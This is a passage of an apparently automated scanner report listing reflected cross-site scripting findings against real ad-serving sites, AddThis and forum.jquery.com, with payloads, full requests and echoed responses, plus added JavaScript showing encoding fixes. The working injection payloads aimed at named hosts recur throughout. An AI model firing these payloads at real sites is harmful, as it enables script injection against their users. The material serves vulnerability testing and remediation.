User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1297259893|1297261770; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:49:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/499328110/x23e6122"><script>alert(1)</script>5136673dd89/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.96. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59059"><script>alert(1)</script>225e1a98943 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM59059"><script>alert(1)</script>225e1a98943/DLX/1937870846@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM59059"><script>alert(1)</script>225e1a98943/DLX/281813167/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.97. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>010ab70397b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8b439"><script>alert(1)</script>010ab70397b/1937870846@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8b439"><script>alert(1)</script>010ab70397b/356583141/x92/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.98. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a70"><script>alert(1)</script>67d67439bda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1937870846@x9241a70"><script>alert(1)</script>67d67439bda? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/2098862732/x9241a70"><script>alert(1)</script>67d67439bda/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.99. http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/1937870846@x92

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddf1c"-alert(1)-"05464a05234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
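The remediation text above names the risk but not the fix. As an added example that is not part of the scanner report or of any affected site's code, the following JavaScript shows the two output contexts this section keeps flagging, the double- or single-quoted attribute value (1.98, 1.100 to 1.102, 1.104 to 1.113) and the JavaScript string literal of 1.99, each as the vulnerable concatenation next to a context-aware encoder, checked against the report's own payloads. The function names, the simplified templates and the empty.gif link are illustrative assumptions.

```javascript
// Added example (not from the scanner report or the affected sites): the two
// reflection contexts flagged in this section, each as the vulnerable
// concatenation beside a context-aware encoder, checked with the report's own
// payloads. Function names and templates are illustrative assumptions.

// Context 1: value copied into a quoted HTML attribute
// (findings 1.98, 1.100-1.102, 1.104-1.113).
function renderLinkUnsafe(clickUrl) {
  // Vulnerable: a " or ' in clickUrl closes the attribute and lets new tags in.
  return '<a href="' + clickUrl + '" target="_top"><img src="empty.gif"></a>';
}

// Encode every character that can end a quoted attribute value or start markup.
// Assumes the attribute is quoted; unquoted attributes would also need spaces.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"'\/`=]/g, (ch) =>
    '&#x' + ch.charCodeAt(0).toString(16) + ';');
}

function renderLinkSafe(clickUrl) {
  return '<a href="' + encodeForHtmlAttribute(clickUrl) +
    '" target="_top"><img src="empty.gif"></a>';
}

// Context 2: value copied into a JavaScript string literal (finding 1.99).
function renderScriptUnsafe(queryString) {
  // Vulnerable: a " in queryString ends the literal, so "-alert(1)-" executes.
  return '<script>var camp="' + queryString + '";</script>';
}

// JSON.stringify quotes the value and escapes ", \ and control characters; the
// extra replace keeps </script> (or any markup) from ending the script element
// and neutralises U+2028/U+2029, which are line terminators in JavaScript.
function encodeForJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderScriptSafe(queryString) {
  return '<script>var camp=' + encodeForJsString(queryString) + ';</script>';
}

// Rough structural check: does the rendered markup contain more raw <script>
// tags than the template itself put there?
function containsInjectedScript(html, templateScripts) {
  const count = (html.match(/<script>/gi) || []).length;
  return count > templateScripts;
}

// Payloads taken verbatim from findings 1.98 and 1.99.
const ATTR_PAYLOAD = 'x9241a70"><script>alert(1)</script>67d67439bda';
const JS_PAYLOAD = '?ddf1c"-alert(1)-"05464a05234=1';

// Summarises, for both contexts, whether the payload breaks out.
function demo() {
  return {
    attrUnsafeInjected: containsInjectedScript(renderLinkUnsafe(ATTR_PAYLOAD), 0),
    attrSafeInjected: containsInjectedScript(renderLinkSafe(ATTR_PAYLOAD), 0),
    jsUnsafeBreaksOut: /"-alert\(1\)-"/.test(renderScriptUnsafe(JS_PAYLOAD)),
    jsSafeBreaksOut: /"-alert\(1\)-"/.test(renderScriptSafe(JS_PAYLOAD)),
    safeScript: renderScriptSafe(JS_PAYLOAD),
  };
}
```

demo() returns true for both unsafe renderers and false for both safe ones; the encoder must match the context the value lands in, which is why the attribute encoder and the string-literal encoder are different functions rather than one generic "sanitise" call.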

Request

GET /2/B3DM/DLX/1937870846@x92??ddf1c"-alert(1)-"05464a05234=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11256086249@x23?USNetwork/FarmB_2011Q1_RocketF_BTRT1_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1297259893|1297259893; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2407
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="?ddf1c"-alert(1)-"05464a05234=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

1.100. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13310"><script>alert(1)</script>2c6810a43ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM13310"><script>alert(1)</script>2c6810a43ca/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM13310"><script>alert(1)</script>2c6810a43ca/DLX/212367073/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.101. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121be"><script>alert(1)</script>f7b3acbc85f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX121be"><script>alert(1)</script>f7b3acbc85f/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX121be"><script>alert(1)</script>f7b3acbc85f/544194934/x94/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.102. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/DLX/@x94

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40efc"><script>alert(1)</script>c621429c4d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/@x9440efc"><script>alert(1)</script>c621429c4d4 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1297259893|1297259896

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/611467003/x9440efc"><script>alert(1)</script>c621429c4d4/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG
...[SNIP]...

1.103. http://ds.addthis.com/red/psi/sites/xhtml.co.il/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/xhtml.co.il/p.json

Issue detail

The value of the callback request parameter is copied into the response body as plain text, outside any quoting. The payload eb035<script>alert(1)</script>a932842a89f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. One caveat the scanner does not state: the response is served as Content-Type: text/javascript with no X-Content-Type-Options: nosniff header, so the injected markup only runs in the ds.addthis.com origin if a browser renders the response as an HTML document (for example through content sniffing when the URL is opened directly, which some browsers of this period would do). Restricting callback to an identifier pattern removes the reflection regardless of browser behaviour.

Request

GET /red/psi/sites/xhtml.co.il/p.json?callback=_ate.ad.hpreb035<script>alert(1)</script>a932842a89f&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fxhtml.co.il%2F%2Fhe%2Fpage-700%2FjQuery%3F72f1f&ref=http%3A%2F%2Fburp%2Fshow%2F12&1voxbg HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297134189.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 302
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 09 Feb 2011 13:29:30 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 11 Mar 2011 13:29:30 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297258170.60|1296659685.66; Domain=.addthis.com; Expires=Fri, 08-Feb-2013 13:29:29 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 09 Feb 2011 13:29:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 09 Feb 2011 13:29:30 GMT
Connection: close

_ate.ad.hpreb035<script>alert(1)</script>a932842a89f({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fxhtml.co.il%2f%2fhe%2fpage-700%2fjQuery%3f72f1f"],"segments" : ["60"],"l
...[SNIP]...
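A callback parameter reflected byte for byte is the classic JSONP mistake. The following is an added example, not AddThis code, of how an endpoint such as /red/psi/sites/xhtml.co.il/p.json can handle it: accept only a dotted identifier (the report's legitimate value is _ate.ad.hpre), escape markup characters inside the serialised payload, and send Content-Type and X-Content-Type-Options headers that keep the response from being rendered as HTML. The handler shape, the sample data and the response object are assumptions.

```javascript
// Added example (not AddThis code): safe handling of a JSONP callback
// parameter for an endpoint like the one in finding 1.103. Handler shape,
// sample data and the response object are assumptions for illustration.

// Allow only a dotted JavaScript identifier, capped in length so that nothing
// resembling a script can be smuggled through the name.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isValidCallback(name) {
  return typeof name === 'string' &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// Serialise the payload so that data containing markup cannot end the script
// element or read as HTML; U+2028/U+2029 are JavaScript line terminators.
function toJsonpBody(callback, data) {
  const json = JSON.stringify(data).replace(/[<>\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
  return callback + '(' + json + ');';
}

// Build the response: 400 for a bad callback, and on success a script
// Content-Type plus nosniff so the browser never treats the body as HTML.
function buildJsonpResponse(query, data) {
  const cb = query.callback;
  if (!isValidCallback(cb)) {
    return {
      status: 400,
      headers: {
        'Content-Type': 'text/plain; charset=utf-8',
        'X-Content-Type-Options': 'nosniff',
      },
      body: 'invalid callback',
    };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: toJsonpBody(cb, data),
  };
}

// Constructed sample data with the same shape as the report's response.
const SAMPLE_DATA = {
  urls: ['http://cspix.example/hbpix?pixId=1598'],
  segments: ['60'],
};

// The report's legitimate callback name and the scanner's injected one.
const GOOD_CALLBACK = '_ate.ad.hpre';
const BAD_CALLBACK = '_ate.ad.hpreb035<script>alert(1)</script>a932842a89f';
```

With these rules the injected name is rejected outright, and even a legitimate callback cannot be combined with payload data to produce a `</script>` or `<` in the body, because those characters are emitted as \u escapes that the JavaScript engine, not the HTML parser, decodes.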

1.104. http://forum.jquery.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.jquery.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ff4e"><script>alert(1)</script>d3e1e6933e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8ff4e"><script>alert(1)</script>d3e1e6933e0=1 HTTP/1.1
Host: forum.jquery.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=44433727.1297257169.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.1932706098.1297257169.1297257169.1297257169.1; __utmc=44433727; __utmb=44433727.2.10.1297257169

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=df1e2a1c-0f2e-41ee-b0a9-ad8bca46be51; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=307D16EB1FA0C002C45B016345B7BD30; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 09 Feb 2011 13:15:45 GMT
Server: Apache-Coyote/1.1
Content-Length: 292833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="S
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?8ff4e"><script>alert(1)</script>d3e1e6933e0=1&forumGroupUrl=jquery">
...[SNIP]...

1.105. http://ib.adnxs.com/if [custom_macro parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The value of the custom_macro request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e23d"><script>alert(1)</script>5ac3272bd5f was submitted in the custom_macro parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if?enc=AQAAAAAA4j-amZmZmZnePwAAAADXo_o_mpmZmZmZ3j8AAAAAAADiP9xIJgq8hAUXBWHfHSmrEEI7n1JNAAAAABuRAwA2AQAANwEAAAIAAABJ9wIA5GoAAAEAAABVU0QAVVNEAKAAWAKoAecEDAcAAgUCAAIAAAAARR2NVAAAAAA.&udj=uf%28%27a%27%2C+11322%2C+1297260347%29%3Buf%28%27c%27%2C+49259%2C+1297260347%29%3Buf%28%27r%27%2C+194377%2C+1297260347%29%3B&cnd=!hhQ2PQjrgAMQye4LGAAg5NUBKOcJMQAAAAAAAOI_QhMIABAAGAAgASj-__________8BSABQAFioA2AAaLcC&referrer=http://technorati.com/contact-us/&custom_macro=SEG_CODES_COL%5Ebtg=an.5%3Bbtg=an.51%3Bbtg=cm.de16_1%3Bbtg=cm.de18_1%3Bbtg=cm.ent_h%3Bbtg=cm.polit_h%3Bbtg=cm.shop_h%3Bbtg=cm.sports_h%3Bbtg=cm.sportsfan%3Bbtg=cm.sportsreg7e23d"><script>alert(1)</script>5ac3272bd5f HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
